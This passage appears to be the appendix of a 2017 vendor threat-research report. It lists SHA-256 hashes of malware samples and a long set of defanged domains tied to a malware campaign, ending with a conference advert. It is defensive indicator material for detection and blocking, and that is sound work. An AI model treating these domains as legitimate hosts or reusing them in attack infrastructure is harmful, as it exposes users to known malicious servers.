550b73295af24954fba98ad5a86b2fb977d57e951c3b7f5deb10189bbb26a6fc
42c5651efc6ff62f6315f315f25c0407e773e702f43cca806ffb4c8ff899f524
69d69ef813c95e73881b8c0c567652f4c4c208d25ba778760f8becf79ac924e3
a1f766bbb2beae7a1211003e3b3e63f006ed28a1b7fb2e1549af1ffa2f0f477b
45c3824018e889e8fb006a83386a1e459b563cf9db1546f49c4bbc5faa9ea74e
e911e6e631d26b2f93779868d4b20224b2bfde798f2d42cb9870d951f4f10c53
f66536dff13b1ba415bd4c5fc172632465d33cc388899e976a49380da5620e45
f1af98d63fec8e0164aa6bac58c680c80075545aabdbdc49ef9cb45694d14642
e701fa1b68a80e77863e06de17a19a2f489aefe8af8b47bc0d908c726eb41053
03307e8bbbdceaa8393cdd13fd854d2705b5bfdf211b40a53113b915debbfc02
b5a785aa5284b96f08e9b191b3c1259d13e478523504486a24191b6e239b74e2
7c324b8b01db025d627df826283af003f54d2d5f20d6d52bee380a69a1fcd9d4
08cc9d83ae7f9805058555a43ec0f0daa73346feb38c2c244b3a4311f623d3b7
e73b2fdd33a250705dd044761a1890afe5ba0b1553b2c7ae5dbedd45e58c0a0a
e3d368a3e613f27cfd17db2ed439b6980f9bf0d10458d25066e316e4193c5d18
bfdad4010fb8104881c0392ff3d60e43e9eee73a7f8d00ab2097898dcfc14710
35f636b1876b17b923486924ebe629a98465b480f6635c9db09a16814a5eada3
320183fca03a973f746adba3e5bdac62be152bc4d32c6cf466383cd951ec2560
206c8c6f0bf5792631387b823cb4c1682041805b5c3241cd6d700c6e5475066b
b33e64b53c8f4af8e8cc75feb2de709da7614082ffd19f7a2110eb1b8b8ab546
31f6399b3423324eea084964bd979689bb367021b424e264f32c3787bfce85e7
4a1dcecd71ff7323eb3d0b1bcfc4d61b859e7734fcaa33b01bc3b727557b4d52
c2b5a2df6b792edac0d491a643cb525012f959934ba7a1846e14e51c810d8d42
ff5c86f1287d1b8ffc5822792ac00255176d706859749b7f2d4baef49f1f833a
dfa8a776451866e2773d57f79a839b2baddbf50792794993bdcefd0631c3f9b3
2977ecd28f44130c0afec70578b1c4fe240e39ad201d2ddd7fe1d9c2bd1330a2
5e0612a0124b15e193f630346800aee5307477110a5d4f8df23fc41d1d451387
b39ffb21bcba526d3ee503bcfdd18aee2a2bdec4b0798c6648fd3f25f3d78bb5
b86f42f252d586d032ee0e4022585c457f98f667bbe9f2f4ba4d53e6f34537fa
b30f53594e7e4b21a54c4011d67b2075185ca1b53084078b624341a8ab906702
7e83122da3f7152a5a03deca48dd600315b1c8c285c9e5922e7d691d6afe0f4f
271431e7eb1c89b52ffb154912925dcf9fc4210fa91a2b4c27f27037f1bc9e02
f98ac9b51c9395ed3d28dbfae6116b2f753dfec679223c6a4f9dac948a0e95a8
cc60033583227cda159007add0b3274f5752195bdae47495ee49d299b0a39ff4
0299289e2146e4655a8ba43191243dafab24023dafa857eaf82ed3ef423013a8
63f1f839dbac88b1ad4022e152379d3d909f30eaf34d08b3c459f16845082c94
b7bf2ad207ac67e422bc69ec0058fb21a8f52061b564e1ef565887eaf3dd1dca
d9c2be7b02dcf65889d764ba4ebf9908672c2a234cb4291d89826ff749909623
ca752bfec0b9f14a36c69e0c90edcc846f67923ae81ef5c5719480aecbbedff9
d23d4055c99b7bd3581a83443d934c95d2ec8dd9c690ba29b611e64587add39f
dd4d9ff987aaa9f2bdf526207a97d7182ef3be37fa08591a40e9bdcb8937c2d4
e3feff7f25d06c8e01d62d76a5f6272fa92f41ae05e0fbff51b67b9cc55cf452
00b3dcdeed117b8eaefff05246114c2ca49e88b3ccbac073c5cd87318e215f37
34084bc57ca269c05ef65720bc39d8bd284000316242721982f4538af351852a
df4e6982fe1977a49e37239b2d28a60b39317eb8dcb3e383c74b70fa62007b47
221302051095909ea47eac8ac8b9bcc82c51bab6946aca7c8822aee732fbee30
0205f46daf74ac9a66ac89dad04b805528656e482f452e616e9f260f1ec6f710
09cef29d19f76796b6effae5d6e193efc98c9e1e9e6523566ec995a78daf3dfc
ef704e0118c5935e0afd4632d10c1ef1e69ae026e73fcdc9d9b272db50a8aeba
126636a1fb2e955970051505d834d3d3571105cb82b28393c05222332e29e9c1
f9583642689abf8b472ebd1f67b7ef9b7728837452ac476e68c3f06d62447c6d
5050de5d74798d634d7639ef9638da8f9be63158bbcf2bbfb50038a7ee1e53ed
70871cb6d07a406f6b1748e5614e1ec33b879b159484a9f82354025a801cd1c3
26a93a22a3080545ab09ee93a7385cc0a85d9a75df8d0d88310d8bc639530714
abd5cf43abd878e8d7633e19bc309de840ec4e12624cabd99ac6152d9455d44f
b84328459e911de77827392db7967bb9ebefe90e365a8369ab8716a6b50aa5a2
dfdb3b363d82d552b8b1a1de116f6e68c2a055170a5c83f43575ad3ae9b90ddb
e5ef4e95831f24f345b4c00834b88b19098cada540da6aa60ba7ca861d20fd95
8e04108c5e164c1f077f0abeac10fdf295207e1f160350d999527ce23f078385
385b7126e4f3634ea1dda80d8bb4790e1b1a904d6232e51d0888ffd744b97dbf
3b12c8915af0cea47a7126b4a7f1ae788972dfac366d5573ef2681ff3d13ad41
05bb5e77bb934779bc7b6fff863bdc4f4db9759bf939c3cfff3ab0f75fcd13e7
e7ee85ec5a7c228be03b201502a1e74186f36c7611917bacd9fc67501df3606c
9f7e640951097f84b7ab42514ec2eae951b3c1b817c68efa9daae4345d2695b2
88e075627d93bbf43eabd699ca9afac0cceaf43f18f8c7ac43f2a7f93a247b55
06b8fa74196fa7edccb77a4bde000928a8ec15d56c5dd3c4af7237f876fc0991
c6db6e329d73616e6869bbb4f86fbdcab88c948176253df82729a2010493b09a
93867701be29f7154cf9f4bc72faad9e9859f4db3ed3030c04fcf03bab085b10
7f4fc4475cf86628ac5277c363fbe0bf47e87e726e4247eabe788e4440bf5bff
fd348ee3cc11647a87a7a065cc8dcc63cacad3349da567ce6cb5eb3f7d0a6ad1
fb6aa05b6c9a6d394d33f2a6cdd4a9c626eaf784990b69aab15e6ebc51908739
90aa424f52bd1f227ace86348c707ecc711c808526805915c50dfebf4bc49186
b131f561551cfe16804cffa4ed1651576ddb9e880913d245c23c7756311e474c
1d9ea027c8494e88148aa1b2d87bd13cf753902445423ac63257b89ccff1dd9e
88aafb45bb4e7d68b5476b4673fd38f49c233d42475f7460afae37610004b54a
40c4c891231a3932b5c15b42e1ff302f6fdf4776aab25a67f827333621795d9a
3191b3988616e9e834c883348ab635727d3d1b7e964226ee9488c1e7a482ce3f
f33d5ebb15bf924e590a2bea2c4cb914f1398b5694c2958b0c97c548327403ff
3f73b09d9cdd100929061d8590ef0bc01b47999f47fa024f57c28dcd660e7c22
76c566798ffcede356a8ba95a56c0400d41c746ad1a0f8503b66c9ae3a9e28da
09e39c3598fc68bd8193e47bad89723a8a989fc439cd717bc6cbdc596b144305
6d97956e23d15262be7af32eceff949ee708904cf5dce9cb6f6d732c37fe0692
5994178fd21ef4fbcea34a27890e24d56e5ebd247d26b4219f4d5475e4e00a9c
b2484daed920e8065605675822eb3b0e66d947f024dbc8193f39988a6e37afd9
4f7a58f1809fd0685ec815d0f5c910d39ef27ed2c4576339b3477a44aa756bad
86debb3398b60748c2c1d0d88694c7308f2017c6737490e84fe688396a0c5aa4
f2693ac1f73aa32dc4682ca66918e3ed78ed490cabc942018a6eca8c4aed9630
810e765fc4b9f838ed619a777528b243573d79e93ab29d8e1e3071ea2619fe0f
18241e18bdb290aa026d87c6d3dfa780d76347e8e966f3956bdfe44f36325473
c88771c9a6adc3c8bd6bd2d173c82f0e1c1a5966cbb2f05c5471b978840c2223
5f2e9aa038862b16ab09e6960262a25993e715df786a339bea352411e5e8ab12
f0b5592de97e7e7193b76e073ee21b090884f503c85258ab0cc1d780ae4e41c4
f22ed39d51c61cae0e03b2be39e05d1bfef05e55320aace141332a4a8ed3bd2c
de77795f1344857af0b583e38939f1cbf789b0989b6c8dca4e8ea3a6f0e646a1
60c2d4a1a5f757f5c9d3686bf85a5529e040049723ca3988e1f9560ea93a386d
3c0f463ac70d2f2415fbdb0446ba0fad290fd93b3db9708ffc4a4bdca0b5d4f7
9bb12887255696617d3e6356fe9f343473f6805db7dfabc6585a2ecd3289bff7
2829d72b813345348681d402184d53ec74fa491a0f3c726aae6c39b901fac1e9
d95990b7b03d017a64b8aa9f6133416176902d4195af9917660088245f4ebe7a
e267f9233c885d662804197e153e69cb2f7704f14b5d082dce7fe3c2d581d4df
6886aa1e2760b874a4950cac08e76259ff476a1976a0aeca4d392f60eefca6cc
1773b425ac6c670cabfdfa300c0b0c2724bd0585b87218c3119af39c170d3074
12558c50b9b61d080aac7b0890f1b95142316ae0d4e78dfb98672571543ecf6e
05789b1487fa274943d967834ad530bc89d94aeed8c240f96d9922f05d6fb101
a797aff0ed250f1fffbc6a718796b63907a94ac21d6bb712a5e7786670a9d1fe
f842607898e226fb480979112b0d67e3266ed7abf55f854851db0686ef5e4987
5584a83d69a01b2a3402c21f78284f6de8ac0a7e5dd5b25b6b9b59eb95f4eeaf
86c2d111086dba6c114ed114b1392183c2be4283b1702d5970601d7a29201178
1583319eb9266680c0cdc81937c76242306f365b767abe4f85322bace65f9d3c
949ad75ea9292d2d85498dc3a9ee033d736e40deba1a19a44419d91cee218a58
9011510e459b324b98b45284fba36d92c3dcafb2c9dc7a8a29256b3439a1c526
de6134aec7b39d8f90dcaf1da03ad50ecbc8b48a6e62b6a67d0cec68e9968267
c373ad48e60fb8a396a80927546e9898760422447981238d91679e6ee8a09d6d
2663d24e63d15e6f247039f7d0fb51958eddb5ad7043a2d305e24f8db6477271
8ff4c76bc1bf9a10b17fdcfdd300b89df94be848ecb0af81f6aefba38ec5bfae
102602fd35bd0d00d28f4dfb1bc4eb2a207e4d8cb9f4311ac7b1133f9e43da26
5f860598d21cceeb7d67142b3a75f94cdee5a4bd7ab8718a35b04264154097e3
f3e45f9e4dbd773b64cfe164de9e42f250f996b58b619fc2f0773be7965d235d
6369d5d194bcc1db2ba8d85c3d15b031a1c2f12463a4259e7cd4686c598e436b
ad91716f7148e6f1ecb70184139e32dcf8f5e521cd3f039f5a44d39d9c3ce09b
a8ba70be73578d901c5e2427fd2f63e06801dcba8726a82f1875d84ba147aaa3
7647a422655510e1de02e3d43b176d5c26d1d621680db9a58c047c9bdb615402
3b9b73d3b6e3337974e2bb2d1d49227fe5611354ebf294df56a514a8abfb413a
1a32705bffda8774bf600c81d77a517e809ba9efd93a4fa8608ae9ee78968e3c
413d664b5a7c3e6dbb1f39a971e09aee66e509846604f99ecfdb2be744ab8056
780129565290dfbc00f9bd85c6c0c2a74c980d2baa3ce7f60c102441155d4b07
bfff5e3879908b721c1c9c78cb8162dde2c557c7d8b2e191d75e702c437a4662
3f6a79d68262bbd4401fb9e889ab93d863cde5f095f6bbf3da286f06e41fb39d
215e742c07a0675d309855caf0a5b0560ef679e12b9f15c8ab2a22706bd6353a
1123b618043e9578eb6a50a5ee41bae55c23126448a100cdcfdae255a4f7d408
69c22ca5a0814c285769a05f93235161b24360d02cf24c9527a0eef8becc3886
103e8aa2363344bdbda105d471a6086d2fd4ca87bd71509c0704a096c13da70c
78d88775a781cb31e00dba41d7bb1f67a0928b2dc1b4ab6a0d26f038f894f175
ec341985ced6f2a6001e8b17491682cb69fefc417a90ae2773bc2de4fd6b705c
d2b523a861ecaa02e3ea0ea542087a09ea640ed36bc2c9cba311e91c7b01ecd0
66cbe12b2b6e8869bc5399f96aa73ebc949de0530030f358cca48077aae0b294
d9ee7be833f760311805e92c7b9c448d2c609f258997038383cb337d8183fe71
14ff515a168fb6649f58c4a9d86531b151187df3bfdd1589cbc9804d3a1ec7c9
023f81fd3a34ef94c9fd6928304426929672d4c7e9c98e60b631cbd2e2a56731
cbb7c2fedc753f62fa1bf47f2e0c6aa487eecfd27d867789764dbde97a8b9449
93369c703becbc0bb9960fb55b7d61ae733638e1e6eab10336faf8ce877925f6
f3a1fb80a5c79d3735ddc4328b915a4b034526ae96345c9b2465c16582ab54be
3e30805f1de04950d50d08176c8ac3c2974b42b30913c9aa11693d1a0e34b98a
3cada2c960ec431d0f13edcbee4dcfef1dcbdce0538b511f110cbee2e6470722
cec7a9270993443ed9cd798a3ac64693195805a410f56468518fa48cf5923876
9003bfa0553e0e027105f822d08a82050854ecf6488db4d3c412d6996b1bf632
5e139ca25b1519cc28a8096cb28d2be69f57b1af037674a81902f9c605777543
f40f1dda30d5f959bc21b0049432c53bb06992c7c8fdd5e886a9b3a0fab06877
b2a2d63c68fce4d4bfddd4fd8584b6c638ee26664785df436c48ffa16e177893
fa91599afa18eff9735b0c0328c8cb0fc305f8d924ebb36a609e50e4a6ab256c
0a31bfdc22ff3cea5a160b2c32a98764027be7512ced50825d1be0b93a7e7aa4
6bd3c86cb1f04d08407fccda35b0dd2fc8bd83a3c10f913dded93b4bbba182c9
0909f8383cd77107234b5c1aa1c80a1f1bc2e8a2832284ff3de6636d5ed16b8a
9dde31f29d5180b26eb93dfe2fc07bae76f929b8d3add20fc577033ae234b437
28e888ec5247511d01df376f4be7e08c64841df37d9846580e87145c8efbbd10
5693592ed69ca1cf0a5f8dcf8f548c063da287ce3e164a89df720a39a290feea
1b6651a523be1c42f779877ad11f3b52130686aad4fd4ecdfbc15afbcea56aa2
6d99f010c237fec5ff022cdf2f0df8b26429c1d5f223ca4f1658fc833c9cef3e
46089e4e9aebf5fd5ad1ffaecb3bee5d7490f2cc53b5ed66b7509282ca29438b
998481fbb26e890b83e1738ee12281103ca77775a20c1c6f1705eb6552237e3b
4b373c2d50e600fdae5259bbd3e989d002a776c443869b92afeb5d53b73bd1c0
1f376d4c4febcafa6bdcf8877121c20697046c15f71983a9210762fbf3b5455e
0321f7948476480ab1875ccdeac46c37a58c2f60d63d2a787bdcf292ff2a5685
3bb134617af6f7b0f0c483b315f7ea45b2ed2c4a91005b453c9ec9e86ef0d70b
dad5e918c4ce849f682485bd79e097ac097b554daa897b12151b4595d67980aa
7b801c415f2fb9210c4d89e7d6332c1a812defe78b234d658b60f9337b8f4266
75285821f9997b304058e8bf76c7c3f9f4abcf47e0dffea73d6256f657b9e778
210024ece45a6935da89ab7c5ae3293616679414e96e2157e49f9f607c831bdc
97bbfb81f930d138ff47c3b899eee6917802385b8c8c1626a7679c5cab41c4a2
cbc9e5552cda22130cd7a84cd4b3c68e95eb3f8c2e83dd77253bd1822d1f840d
bf00cd1bc34ce457b0e4a99a8df5b7fda512496dc32f2762923254bc85261afb
9de260dcfe2f5a852c0cff238ffc3fe3fc93feff008463af49f68c9f5b5ebc9b
cadb1646563a317ac72579e8691c464bab439667811fb0d850bc2e950a3a332c
dd3d708ba8ce177fd1f756ac5eb3347a0ec7cf65706438ea5bbdfe9125b0dbe4
31df6ec1089e720c09e29f35ce33203359128c99cc0e4b03ec3e38237e8151ff
e349394a043e11410ed3e7c35c70d85dbb9c5e512b593e51e1acde3b404414a2
dddb5843c775ae47b37fd02c378699b4e250ac32739f30e0949bdaa28050a595
42da6fd7f6ba8b90ffd1298d068045c7928cef6506642e69859e0b962b5864a8
e6624eb4520d41516f64aa64a00ee224c8bf257403a12a9665d552348dad1bd5
79ca3b8afac2ca896d7db2110789a187ad75810e2d92aa6f0378f73c1f72006f
ad08a0e1dace8d5a443a4bd21ec8d935e267f364ae1b152edaccb0b1f82870d7
b87ada7c17cdb5b7c3cf1e6a0d35515c62112126f2f983c1190a6d9d1060b7db
2ec204d0f35404c2548ac3dbc7b02e5db7ba28d4bc5c701986f0bfcee2a5fa5a
77e1dfaeb73c4edf762f9503c428c1d92af6882b48305f5f5b070ec136575e43
610d37dfb3089b516e4bced89de0c5161614d50ca511853f7be81138dfc4e844
60ff74d053037b5ae70eeaf199a0acba35f58d275d12915ae8ed813dbf9a5b55
376943f886b264824f6063e7dfc54a1a2d5071a3d44dec05208596079d6cf276
89d4d851e6729a854fccb4d4f9277f9f545396714ff2b108d29c7ff418a501a3
18db52a63720187b2afd57667e9ebdcb0a50a8e99909340281dcd07e266d761f
bb05a0d905b915e2e84a8e69c2af438f72730131c5a1e3e1fe85df13c61182ac
187155b727346d63c1b1c8e4e3ae88aed89746a4a323b5170139fa5aa760b3a3
7451c813eebe45ee8c743abc5e75c9475cab427d44e9a255f89f73c4e7ca7106
44cd0fdb877838f559d60500cd08cee66d8a79005d7e86f81671c18ec7ab3cb5
810aed604e1ec5d5aec00c783bc44e5ca753c5c0f2dc64f431c8f8d48b6dbf41
Appendix B: Associated Domains
1c-host[.]host
1cpred[.]org
allforest[.]pw
antiprt[.]com
atonix[.]pw
babbabbab[.]ru
babbabbab2[.]ru
babbebbab[.]com
babbebbab2[.]com
babbibbab2[.]ua
babbihbab[.]host
babblabbab2[.]link
babblahbab[.]com
babblebbab[.]pw
babblebbab2[.]pw
babblehbab[.]top
babblibbab2[.]xyz
babblihbab[.]link
babblohbab[.]pw
babblulbab[.]pw
babbobbab[.]link
babbohbab[.]com
babbolbab[.]host
babbolbab[.]ru
babbrabbab2[.]xyz
babbrebbab[.]rocks
babbrebbab2[.]rocks
babbrehbab[.]pw
babbribbab2[.]space
babbrihbab[.]xyz
babbrohbab[.]rocks
babbrulbab[.]rocks
babbulbab[.]com
babchabbab[.]org
babchabbab2[.]org
babchebbab2[.]ru
babchehbab[.]in
babchibbab[.]com
babchihbab[.]org
babcholbab[.]org
babclabbab2[.]space
babclebbab[.]biz
babclebbab2[.]biz
babclehbab[.]rocks
babclibbab2[.]in
babclihbab[.]space
babclohbab[.]biz
babclulbab[.]biz
babcrabbab2[.]in
babcrambab[.]ru
babcrebbab[.]org
babcrebbab2[.]org
babcrehbab[.]biz
babcribbab[.]ru
babcrihbab[.]in
babcrohbab[.]org
babcruhbab[.]host
babcrulbab[.]org
babdabbab[.]ua
babdabbab2[.]ua
babdebbab[.]link
babdebbab2[.]link
babdibbab2[.]pw
babdihbab[.]top
babdobbab[.]xyz
babdohbab[.]link
babdolbab[.]top
babdrabbab2[.]ru
babdrambab[.]ua
babdrebbab[.]com
babdrebbab2[.]com
babdrehbab[.]org
babdribbab[.]ua
babdrihbab[.]host
babdrohbab[.]com
babdruhbab[.]top
babdrulbab[.]com
babdulbab[.]link
babfabbab[.]pw
babfabbab2[.]pw
babfebbab[.]top
babfebbab[.]xyz
babfebbab2[.]xyz
babfibbab2[.]rocks
babfihbab[.]pw
babflabbab2[.]ua
babflambab[.]pw
babflebbab[.]link
babflebbab2[.]link
babflehbab[.]com
babflibbab[.]pw
babflihbab[.]top
babflohbab[.]link
babfluhbab[.]pw
babflulbab[.]link
babfobbab[.]space
babfohbab[.]xyz
babfolbab[.]pw
babfrabbab2[.]pw
babfrebbab[.]xyz
babfrebbab2[.]xyz
babfrehbab[.]link
babfribbab[.]rocks
babfrihbab[.]pw
babfrohbab[.]xyz
babfrulbab[.]xyz
babfulbab[.]xyz
babgabbab2[.]rocks
babgebbab[.]space
babgebbab2[.]space
babgibbab2[.]biz
babgihbab[.]rocks
babglabbab2[.]rocks
babglebbab[.]space
babglebbab2[.]space
babglehbab[.]xyz
babglibbab[.]biz
babglihbab[.]rocks
babglohbab[.]space
babglulbab[.]space
babgobbab[.]in
babgofbab[.]biz
babgohbab[.]space
babgrabbab2[.]biz
babgrebbab[.]in
babgrebbab2[.]in
babgrehbab[.]space
babgribbab[.]org
babgrihbab[.]biz
babgrohbab[.]in
babgrulbab[.]in
babgulbab[.]space
babhabbab2[.]biz
babhebbab[.]in
babhebbab2[.]in
babhibbab2[.]org
babhihbab[.]biz
babhohbab[.]in
babhulbab[.]in
babjabbab2[.]org
babjebbab[.]ru
babjebbab2[.]ru
babjibbab2[.]com
babjihbab[.]org
babjohbab[.]host
babjulbab[.]host
babkabbab2[.]com
babkebbab[.]ua
babkebbab2[.]ua
babkehbab[.]host
babkibbab2[.]link
babkihbab[.]com
babkohbab[.]top
babkulbab[.]top
bablabbab2[.]link
bablebbab[.]pw
bablebbab2[.]pw
bablehbab[.]top
bablibbab2[.]xyz
bablihbab[.]link
bablohbab[.]pw
bablulbab[.]pw
babmabbab[.]xyz
babmabbab2[.]xyz
babmebbab[.]rocks
babmebbab2[.]rocks
babmehbab[.]pw
babmibbab2[.]space
babmihbab[.]xyz
babmilbab[.]pw
babmohbab[.]rocks
babmulbab[.]rocks
babnabbab2[.]space
babnebbab[.]biz
babnebbab2[.]biz
babnehbab[.]rocks
babnibbab2[.]in
babnihbab[.]space
babnohbab[.]biz
babnulbab[.]biz
babpabbab2[.]in
babpebbab[.]org
babpebbab2[.]org
babpehbab[.]biz
babpibbab2[.]ru
babpihbab[.]in
babplabbab2[.]org
babplebbab[.]ru
babplebbab2[.]ru
babplehbab[.]in
babplibbab[.]com
babplifbab[.]ru
babplihbab[.]org
babplohbab[.]host
babplulbab[.]host
babpohbab[.]org
babprabbab2[.]com
babprebbab[.]ua
babprebbab2[.]ua
babprehbab[.]host
babpribbab[.]link
babprihbab[.]com
babprulbab[.]top
babpulbab[.]org
babrabbab2[.]ru
babrebbab[.]com
babrebbab2[.]com
babrehbab[.]org
babribbab2[.]ua
babrihbab[.]host
babrohbab[.]com
babrulbab[.]com
babsabbab2[.]ua
babsahbab[.]host
babsebbab[.]link
babsebbab2[.]link
babsehbab[.]com
babsibbab2[.]pw
babsihbab[.]top
babskabbab2[.]link
babskebbab[.]pw
babskebbab2[.]pw
babskehbab[.]top
babskibbab[.]xyz
babskihbab[.]link
babslabbab2[.]xyz
babslebbab2[.]rocks
babslehbab[.]pw
babslibbab[.]space
babslihbab[.]xyz
babsmabbab2[.]space
babsmebbab2[.]biz
babsmehbab[.]rocks
babsmibbab[.]in
babsmihbab[.]space
babsnabbab2[.]in
babsnebbab2[.]org
babsnehbab[.]biz
babsnibbab[.]ru
babsnihbab[.]in
babsofbab[.]pw
babsohbab[.]link
babspabbab[.]ru
babspabbab2[.]ru
babspebbab2[.]com
babspefbab[.]ru
babspehbab[.]org
babspibbab[.]ua
babspihbab[.]host
babspolbab[.]host
babstabbab[.]ua
babstabbab2[.]ua
babstebbab2[.]link
babstefbab[.]com
babstehbab[.]com
babstibbab[.]pw
babstihbab[.]top
babstolbab[.]top
babstrabbab[.]pw
babstrabbab2[.]pw
babstrebbab2[.]xyz
babstrefbab[.]pw
babstrehbab[.]link
babstribbab[.]rocks
babstrihbab[.]pw
babstrolbab[.]pw
babsulbab[.]link
babswabbab[.]rocks
babswabbab2[.]rocks
babswebbab2[.]space
babswehbab[.]xyz
babswibbab[.]biz
babswihbab[.]rocks
babswolbab[.]rocks
babtabbab2[.]pw
babtahbab[.]top
babtebbab[.]xyz
babtebbab2[.]xyz
babtehbab[.]link
babtibbab2[.]rocks
babtihbab[.]pw
babtohbab[.]xyz
babtrabbab[.]biz
babtrabbab2[.]biz
babtrebbab2[.]in
babtrehbab[.]space
babtribbab[.]org
babtrihbab[.]biz
babtrolbab[.]biz
babtulbab[.]xyz
babvabbab2[.]rocks
babvahbab[.]pw
babvebbab[.]space
babvebbab2[.]space
babvehbab[.]xyz
babvibbab2[.]biz
babvihbab[.]rocks
babvohbab[.]space
babvulbab[.]space
babwabbab2[.]biz
babwahbab[.]rocks
babwebbab[.]in
babwebbab2[.]in
babwehbab[.]space
babwibbab2[.]org
babwihbab[.]biz
babwohbab[.]in
babwulbab[.]in
babyabbab2[.]org
babyahbab[.]biz
babyebbab[.]ru
babyebbab2[.]ru
babyehbab[.]in
babyibbab2[.]com
babyihbab[.]org
babyohbab[.]host
babyulbab[.]host
babzabbab2[.]com
babzahbab[.]org
babzebbab[.]ua
babzebbab2[.]ua
babzehbab[.]host
babzibbab2[.]link
babzihbab[.]com
babzohbab[.]top
babzulbab[.]top
bannarbor[.]pw
bisquitshore[.]xyz
bitrixon[.]biz
buhgalter[.]pw
buhgalter[.]rocks
buhgalters[.]xyz
businessolution[.]site
cheturion[.]org
chipacom[.]net
cloneduring[.]pw
companysafa[.]biz
corpofname[.]pw
datamining[.]press
dersteoyna[.]pw
dovnikus[.]su
efros[.]pw
flashclicks[.]info
forbusinessgo[.]xyz
fortificar[.]net
fracking[.]host
gateoflife[.]pw
gaz[.]rocks
gedealer[.]pw
globuspp[.]pw
grandvita[.]pw
greenlanterns[.]xyz
greenworldsun[.]xyz
guardomorph[.]com
guwang[.]pw
jobforreborn[.]xyz
kokinatsu[.]pw
kukuzaki[.]me
kupala[.]me
lastsnow[.]link
maradonianos[.]pw
mercurytod[.]pw
muxa[.]club
mycorpsafa[.]biz
n-nalog78[.]com
newsunconcept[.]in
newsupport[.]us
nothingmore[.]us
novayarabota[.]pw
nvpn[.]pw
odejda77[.]net
okvd[.]biz
olen[.]bid
onechat[.]pw
placetobuy[.]pw
platej[.]pw
poplata-da[.]org
portw[.]org
powersand[.]link
pricemeet[.]pw
puldisk[.]xyz
rabotadnya[.]pw
raintor[.]pw
ricarier[.]org
rosgaz[.]pw
rumoney[.]xyz
salesforlife[.]top
salesline[.]top
sam-sam[.]pw
sandstyle[.]biz
sandw[.]pw
santrimo[.]lol
seclist[.]site
seclist[.]top
selenaspace[.]space
sellgrax[.]club
semodo[.]pw
sensetunoespossible[.]cat
shortsell[.]trade
shortselling[.]club
sixgoats[.]pw
snp500[.]trade
solotender[.]pw
sslprivate[.]org
tapalulumba[.]com
taskhoper[.]com
titleworld[.]pw
torglend[.]com
tradertop[.]top
trendkop[.]pw
tyuocruz1312[.]net
uchet[.]pw
uchet[.]space
visitpalace[.]xyz
volumexp[.]xyz
vortexenism[.]biz
vpnserv[.]pw
vwv.flashclicks[.]info
winsocket[.]xyz
yearreviews[.]net
Ignite ’17 Security Conference: Vancouver, BC June 12–15, 2017
Ignite ’17 Security Conference is a live, four-day conference designed for today’s security professionals. Hear from innovators and experts, gain real-world skills through hands-on sessions and interactive workshops, and find out how breach prevention is changing the security industry. Visit the Ignite website for more information on tracks, workshops and marquee sessions.
Updated 3/30/17: To remove unnecessary IPS Signature number.
Related Malware Resources
Threat Research
Threat Actor Groups
High Profile Threats
Get updates from Unit 42